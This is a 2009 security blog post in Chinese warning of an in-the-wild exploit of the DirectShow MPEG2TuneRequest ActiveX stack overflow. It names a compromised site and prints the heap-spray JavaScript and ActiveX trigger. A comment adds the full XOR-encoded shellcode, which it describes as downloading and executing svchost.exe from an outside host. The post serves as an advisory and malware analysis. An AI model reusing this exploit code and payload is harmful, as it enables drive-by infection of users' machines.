Windows LiveWindows Live
 
 
Profil de XiangBlast祥的共享空间Blog Outils Aide

Blog
    4 juillet

    2009.7.4 BDATuner.MPEG2TuneRequest Stack Overflow Exploit (高)

    发现日期:2009-7-4

    预计利用率提升几率 : 高▁▂▃▄▅▆

    被挂马网站: 8oy4t.8866.org
    挂马页: hxxp://8oy4t.8866.org/aa/go.jpg
    漏洞名:  BDATuner.MPEG2TuneRequest Stack Overflow Exploit
    CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
    软件:  Microsoft DirectShow(msvidctl.dll)
    版本: Possible all avaliable versions

    article by safelab.spaces.live.com

    ShellCode如下(有缩略):

    var appllaa='0';
    var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
    var dashell=unescape(nndx+'%u5858%u5858%u10EB%u4B5B.....%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA'); // xor:0BD
    var headersize=20;
    var omybro=unescape(nndx);
    var slackspace=headersize+dashell.length;
    while(omybro.length<slackspace)
    omybro+=omybro;
    bZmybr=omybro.substring(0,slackspace);
    shuishiMVP=omybro.substring(0,omybro.length-slackspace);
    while(shuishiMVP.length+slackspace<0x30000)  //生成大量数据
    shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
    memory=new Array();
    for(x=0;x<300;x++)
    memory[x]=shuishiMVP+dashell;
    var myObject=document.createElement('object');
    DivID.appendChild(myObject);
    myObject.width='1';
    myObject.height='1';
    myObject.data='./logo.gif'; //一个非GIF文件
    myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

    得知试图访问hxxp://milllk.com/wm/svchost.exe,请为此对象设置KillBit防范漏洞。

    22:45 | Ajouter au blog | 漏洞预警

    Commentaires (5)

    Veuillez patienter...
    Le commentaire entré est trop long. Raccourcissez-le.
    Vous n'avez rien entré. Réessayez.
    Il est actuellement impossible d'ajouter votre commentaire. Réessayez plus tard.
    Pour ajouter un commentaire, tu dois avoir l'autorisation de tes parents. Demander l'autorisation
    Tes parents ont désactivé les commentaires.
    Il est actuellement impossible de supprimer votre commentaire. Réessayez plus tard.
    Vous avez dépassé le nombre maximal de commentaires qu'il est possible d'envoyer le même jour. Réessayez dans 24 heures.
    Votre compte a pu laisser les commentaires désactivés parce que nos systèmes indiquent que vous risquez d'arroser d'autres utilisateurs de messages. Si vous pensez que votre compte a été désactivé par erreur, contactez l'assistance en ligne de Windows Live.
    Effectuez la vérification de sécurité ci-dessous pour finaliser l'envoi de votre commentaire.
    Les caractères entrés pour la vérification de sécurité doivent correspondre à ceux de l'image ou du fichier audio.

    Pour ajouter un commentaire, connectez-vous avec votre identifiant Windows Live ID (si vous utilisez Messenger ou Xbox LIVE, vous avez un identifiant Windows Live ID). Connectez-vous


    Vous n'avez pas d'identifiant Windows Live ID ? Inscrivez-vous
    Xiang Blasta écrit :
    to : lijing
    sites you've posted were added to malicious sites (ad sites/cheating sites) prewarning of 2009.7.12.
    11 Juil.
    jing lia écrit :
    11 Juil.
    Xiang Blasta écrit :
    Shellcode: 移入3B8个字节并逐一xor 0BD,LoadLibraryA : User32, urlmon, shell32,并SHGetSpecialFolderPathA(0x1A)(%userprofile%\Application Data), URLDownloadToFileA : svchost.exe -> %userprofile%\Application Data\a.exe , 最后CreateProcessInternalA执行文件 , 不过最后加载的shdocvw.#101确实不知道他想干什么
    7 Juil.
    Xiang Blasta écrit :
    Full shellcode (please change ! to %u)
    !9090!9090!5858!5858!10EB!4B5B!C933!B966!03B8!3480!BD0B!FAE2!05EB!EBE8!FFFF!54FF!BEA3!BDBD!D9E2!8D1C!BDBD!36BD!B1FD!CD36!10A1!D536!36B5!D74A!E4AC!0355!BDBF!2DBD!455F!8ED5!BD8F!D5BD!CEE8!CFD8!36E9!B1FB!0355!BDBC!36BD!D755!E4B8!2355!BDBF!5FBD!D544!D3D2!BDBD!C8D5!D1CF!E9D0!AB42!7D38!AEC8!D2D5!BDD3!D5BD!CFC8!D0D1!36E9!B1FB!3355!BDBC!36BD!D755!E4BC!D355!BDBF!5FBD!D544!8ED1!BD8F!CED5!D8D5!E9D1!FB36!55B1!BCD2!BDBD!5536!BCD7!55E4!BFF2!BDBD!445F!513C!BCBD!BDBD!6136!7E3C!BD3D!BDBD!BDD7!A7D7!D7EE!42BD!E1EB!7D8E!3DFD!BE81!C8BD!7A44!BEB9!DCE1!D893!F97A!B9BE!D8C5!BDBD!748E!ECEC!EAEE!8EEC!367D!E5FB!9F55!BDBC!3EBD!BD45!1E54!BDBD!2DBD!BDD7!BDD7!BED7!BDD7!BFD7!BDD5!BDBD!EE7D!FB36!5599!BCBC!BDBD!FB34!D7DD!EDBD!EB42!3495!D9FB!FB36!D7DD!D7BD!D7BD!D7BD!D7B9!EDBD!EB42!D791!D7BD!D7BD!D5BD!BDA2!BDB2!42ED!81EB!FB34!36C5!D9F3!C13D!42B5!C909!3DB1!B5C1!BD42!B8C9!C93D!42B5!5F09!3456!3D3B!BDBD!7ABD!CDFB!BDBD!BDBD!FB7A!BDC9!BDBD!D7BD!D7BD!D7BD!36BD!DDFB!42ED!85EB!3B36!BD3D!BDBD!BDD7!F330!ECC9!CB42!EDCD!CB42!42DD!8DEB!CB42!42DD!89EB!CB42!42C5!FDEB!4636!7D8E!668E!513C!BFBD!BDBD!7136!453E!C0E9!34B5!BCA1!7D3E!56B9!364E!3671!3E64!AD7E!7D8E!ECED!EDEE!EDED!EDED!EAED!EDED!EB42!36B5!E9C3!AD55!BDBC!55BD!BDD8!BDBD!DED5!CACB!D5BD!D5CE!D2D9!36E9!B1FB!9955!BDBD!34BD!81FB!1CD9!BDB9!BDBD!1D30!42DD!4242!D8D7!CB42!3681!ADFB!B555!BDBD!8EBD!EE66!EEEE!42EE!3D6D!5585!853D!C854!3CAC!B8C5!2D2D!2D2D!B5C9!4236!36E8!3051!B8FD!5D42!1B55!BDBD!7EBD!1D55!BDBD!05BD!BCAC!3DB9!B17F!55BD!BD2E!BDBD!513C!BCBD!BDBD!4136!7A3E!7AB9!8FBA!2CC9!7AB1!B9FA!34DE!F26C!FA7A!1DB5!2AD8!7A76!B1FA!FDEC!C207!FA7A!83AD!0BA0!7A84!A9FA!D405!A669!FA7A!03A5!DBC2!7A1D!A1FA!1441!108A!FA7A!259D!ADB7!D945!8D1C!BDBD!36BD!B1FD!CD36!10A1!D536!36B5!D74A!E4B9!E955!BDBD!2DBD!455F!8ED5!BD8F!D5BD!CEE8!CFD8!36E9!55BB!42E8!4242!5536!B8D7!55E4!BD88!BDBD!445F!428E!42EA!B9EB!BF56!7EE5!4455!4242!E642!BA7B!3405!BCE2!7ADB!B8FA!5D42!EE7E!6136!D7EE!D5FD!ADBD!BDBD!36EA!9DFB!A555!4242!E542!EC7E!36EB!81C8!C936!C593!48BE!36EB!9DCB!48BE!748E!FCF4!BE10!8E78!B266!AD03!6B87!B5C9!767C!BEBA!FD67!4C56!A286!5AC8!36E3!99E3!60BE!36DB!F6B1!E336!BEA1!3660!36B9!78BE!E316!7EE4!6055!4241!0F42!5F4F!8449!C05F!673E!C6F5!8F80!2CC9!38B1!1262!DE06!6C34!ECF2!07FD!1DC2!2AD8!A376!D919!2E52!598F!3329!B7AE!7F11!F6A4!79BC!A230!EAC9!B0DB!FE42!1103!C066!184D!EF27!1A43!8367!0BA0!0584!69D4!03A6!DBC2!411D!8A14!2510!ADB7!3D45!126B!4627!A8EE!D5DB!c9c9!87cd!9292!d4d0!d1d1!d6d1!de93!d0d2!ca92!92d0!cbce!d5de!ced2!93c9!c5d8!bdd8!bdBD!BDBD!BDBD!BDBD!BDBD!BDBD!BDBD!EAEA
    7 Juil.
    Xiang Blasta écrit :
    几点声明:
    (1)此漏洞发现于2009-7-4 22:40左右,其实我希望的是早一些预警,所以通常我会在发现漏洞的第一时间发出来,一般也会早于杀软厂商公布时间,甚至于几天,但这并不表明漏洞是我挖掘出的,所以不要问我怎么挖掘漏洞了,很抱歉的是我的能力还没有那个水平,所以也无法回答这类问题。
    (2)至于ShellCode不完整的话,一是防止杀软误报本页,二是防止被恶意利用,所以如果你真的需要原始代码,请读取“挂马页”的源代码,那样你就可以获取完整的数据了。如果挂马页失效,那漏洞通常都已经大规模爆发或消沉了,也就没有研究的必要了,对吧^_^
    (3)关于此漏洞可执行的版本,由于我并没有测试,所以用了Possible表示,一般这样标记的话,影响系统版本是会有偏差的,据测试,这个漏洞会在IE6.0及以下程序成功执行,而IE7.0及以上则很可能是执行失败的。
    5 Juil.

    Rétroliens

    L'URL de rétrolien de ce billet est :
    http://safelab.spaces.live.com/blog/cns!A6B213403DBD59AF!1420.trak
    Blogs Web qui font référence à ce billet
    • Aucune